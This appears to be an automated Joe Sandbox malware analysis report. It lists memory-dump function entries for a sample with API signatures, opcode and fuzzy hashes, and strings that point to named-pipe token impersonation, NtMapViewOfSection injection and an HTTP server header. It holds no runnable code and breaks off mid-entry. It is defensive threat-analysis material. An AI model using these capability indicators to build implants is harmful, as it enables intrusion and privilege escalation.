                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                  • String ID:
                  • API String ID: 3191669884-0
                  • Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                  • Instruction ID: 596527fb2956cf06ef0f9c17d9c11670ce0b2f2a69f9a8ca5f700cec573eb03b
                  • Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                  • Instruction Fuzzy Hash: 6A31A072304BE886E7389B51D849B9DB6A4FB44BFCF1C4125EE540BB99CB36C851C704
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTickioctlsocket
                  • String ID:
                  • API String ID: 3686034022-0
                  • Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                  • Instruction ID: 98b6fba4812263e1c1648aed8c274acaa5a4d007cfc7017489ebb128e29a710d
                  • Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                  • Instruction Fuzzy Hash: 6B119431204EE096F7186B65EC4D3597360FF84BACF580324DA65866E8DF7AD88A9710
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                  • String ID:
                  • API String ID: 4232080776-0
                  • Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                  • Instruction ID: 9a3f15cbadba4de07a9813a06cdd863109740abce50f0241cbdf0e6db5d47366
                  • Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                  • Instruction Fuzzy Hash: 5F21BE32210EE086F759AB21EC9D76A3365FFD8B4CF8C0216E80A425ADCF6EC549C710
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                  • String ID:
                  • API String ID: 2328795619-0
                  • Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                  • Instruction ID: e8b3aac241594f0927df6dbc4c6429e54a841ccd37561cae6fa1cc8e417a5e95
                  • Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                  • Instruction Fuzzy Hash: 89510931704EF086FA3E8AA65D087696694BF44BFCF1C4714AE394BBDDCB36D8918240
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                  • String ID:
                  • API String ID: 445582508-0
                  • Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                  • Instruction ID: fcaaf49fda44208da46ca93b73088a42dce2f4c5393bad58fa0b58871b46620c
                  • Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                  • Instruction Fuzzy Hash: FA51BD32605EE082EB3A8F10D848329A7A5FF94B6CF9D4155DA4A4B7E8DB7AC841C700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                  • String ID:
                  • API String ID: 3587854850-0
                  • Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                  • Instruction ID: 5f25075e232cfb397a4eaf3a946f17b0dd5688ef36ed9946b0116ea98882b198
                  • Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                  • Instruction Fuzzy Hash: 0A41A431300EE046EA18EB129C597AD6251BFD8BDCF488125EE5A477DADF3EC506C700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                  • String ID:
                  • API String ID: 3426420785-0
                  • Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                  • Instruction ID: 8cdff15867be3cf14ba58afed8377c8bfbf3a9196d91c18268e18ca4fd178b14
                  • Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                  • Instruction Fuzzy Hash: 56417E31710EB055FB08EBB1DC8D7D926A4BF8879CF484511EE1A476AEDF3AC1068710
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$Option$ConnectOpenRevertSelf
                  • String ID:
                  • API String ID: 1513466045-0
                  • Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                  • Instruction ID: 0339c4326fb9d8e1f1eae201d5f5a94a45ed63649c706a146237130b5202c36f
                  • Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                  • Instruction Fuzzy Hash: 5E419A75200FE182EB2CEB11EC99BA97791FB8474DF084115DA5B07BAADF7EC4068700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                  • String ID:
                  • API String ID: 2310505145-0
                  • Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                  • Instruction ID: 95c7502f8a78719018ceec9504124ba8b4abddff9977be5ab39bc027f4858169
                  • Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                  • Instruction Fuzzy Hash: E0415171205EE0C6EB18AF25EC4871A77A1FB9579CF5C8215FA89477ACDB3AC481CB10
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                  • String ID:
                  • API String ID: 1014270282-0
                  • Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                  • Instruction ID: 82c9577e9c2b559908c129caf23edd3a766dae92803f800063ff033377e67f55
                  • Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                  • Instruction Fuzzy Hash: F7418132614FD086EB58DF62E8483997794FB89BDCF0C4625EA4943B99DB3DC6058B10
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                  • String ID:
                  • API String ID: 1547050394-0
                  • Opcode ID: 14f9975bf4e765c4172f8029720c17abc7a3d9028f0f4e986d1a5709473ec300
                  • Instruction ID: 7656f341f0d7cb759ca35ec77cf28f5a681182cffc07d1e9fb54a8d8fcf740fc
                  • Opcode Fuzzy Hash: 14f9975bf4e765c4172f8029720c17abc7a3d9028f0f4e986d1a5709473ec300
                  • Instruction Fuzzy Hash: AA213D70628F6E5FF790BB3C489D37A76D2FB98308F01052A9449C72AAEE35CC404362
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                  • String ID:
                  • API String ID: 1547050394-0
                  • Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                  • Instruction ID: 0eeefffcb98c2d54062534211f630df5972e22edd132d828c6685da9662f87b0
                  • Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                  • Instruction Fuzzy Hash: 46210871314EE186F73A9B619C0835DA6987F45BECF4C442099498FB9EDB3EC5508B00
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                  • String ID:
                  • API String ID: 1616846154-0
                  • Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                  • Instruction ID: 98647ebaea8a0a7d86aba9305c0cc23b4bfe578f7fb00ba42b7a8d562a236c03
                  • Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                  • Instruction Fuzzy Hash: DA116035704FE041E928F752A8593AE5291BFD5BECF4C4225AE694BBCEDF2EC5018740
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                  • String ID:
                  • API String ID: 3798860377-0
                  • Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                  • Instruction ID: 7f5c9103b9ca14fa780ebb3aa5e1907737ae77f9922941c9b53ab191565053fd
                  • Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                  • Instruction Fuzzy Hash: 77118432604EA093FB249B25FD5D71D6291FBD4BACF488210EA6A57A9CCF7DC4468701
                  APIs
                  Strings
                  • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 00000265B01BF044
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                  • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                  • API String ID: 3518644649-2739389480
                  • Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                  • Instruction ID: 93c224f93d7148299d491cae9f2e75e38a9bfe36a2097c143ebd37037a161187
                  • Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                  • Instruction Fuzzy Hash: A901A135601BE041EA48EB52B8487596699FBC8BE8F184219FEA9477CACF39C0418780
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: freemallocstrchr$rand
                  • String ID:
                  • API String ID: 1305919620-0
                  • Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                  • Instruction ID: 0040ed011982af758725ad8190e9095cf580942dc6026471c300bb674fe10dee
                  • Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                  • Instruction Fuzzy Hash: 52710B72604FD441FA2AAF29A8193EA6390FFD5B9CF0C5115DF85177AADF2EC1568300
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$_errno$_callnewhmalloc
                  • String ID:
                  • API String ID: 2761444284-0
                  • Opcode ID: a46d6df1e63736bbf5e6f8efd513222b2720334364c4a35ae3722e37f335d37b
                  • Instruction ID: 9f74afb3ceef36df7a457cc44e1d68776349c6fc787a1442939fdd6264e99479
                  • Opcode Fuzzy Hash: a46d6df1e63736bbf5e6f8efd513222b2720334364c4a35ae3722e37f335d37b
                  • Instruction Fuzzy Hash: 4551E934218E1E4BE75A9B2D94A967A73D0FB59748F40812DE84AC329BEF11DC02C7D6
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$_errno$_callnewhmalloc$AllocHeap
                  • String ID:
                  • API String ID: 996410232-0
                  • Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                  • Instruction ID: e7244914e68d0f10a1751ba5a60213503f6ba51f3d730e784b6cc07c1d28a71d
                  • Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                  • Instruction Fuzzy Hash: 3541BC32300FF18BEA5D9B66AD5836A27A4FB89B8CF484125EF6617749DF35D422C300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: htonl$freemalloc
                  • String ID: zyxwvutsrqponmlk
                  • API String ID: 1249573706-3884694604
                  • Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                  • Instruction ID: 9dc242aca840f79a25bbc3edb67af1a5048fe97fa6f871980fe45629802cc5c2
                  • Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                  • Instruction Fuzzy Hash: 5E31EA31301BE046EB18EA76AD593696691BF95BDCF084438ED5A47B9FDB3DC4468300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                  • String ID: NtMapViewOfSection$ntdll.dll
                  • API String ID: 1006775078-3170647572
                  • Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                  • Instruction ID: 0125ac618860e30cae47a1d00271a07dba37843a279663bfab72a2e89dfba98e
                  • Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                  • Instruction Fuzzy Hash: 5531B632700F9482EB18EB51A8597596790FB98BBCF084725EE69077D9DF7DC4458700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                  • String ID: %s\%s
                  • API String ID: 1896346573-4073750446
                  • Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                  • Instruction ID: e420fdfa2ad1df70992b7e26783a7f06000d8eacd8c8a577f91461318ff94894
                  • Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                  • Instruction Fuzzy Hash: 8FF06D35204FE085E618AB11BC1529AA260FB88BDCF5C4125BF8817B9ECF3AC4118744
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: malloc$_snprintf$_errno$_callnewhfreerealloc
                  • String ID:
                  • API String ID: 74200508-0
                  • Opcode ID: fd4b1ce187cf5d2c7b3c7d1d5f2f485ec143d87fcb2d796d9dd721ce5a89571b
                  • Instruction ID: f82a73cc6f2ad2728dc14838c2d0490ead91a4ba237c045a2a84f89302fc6eb4
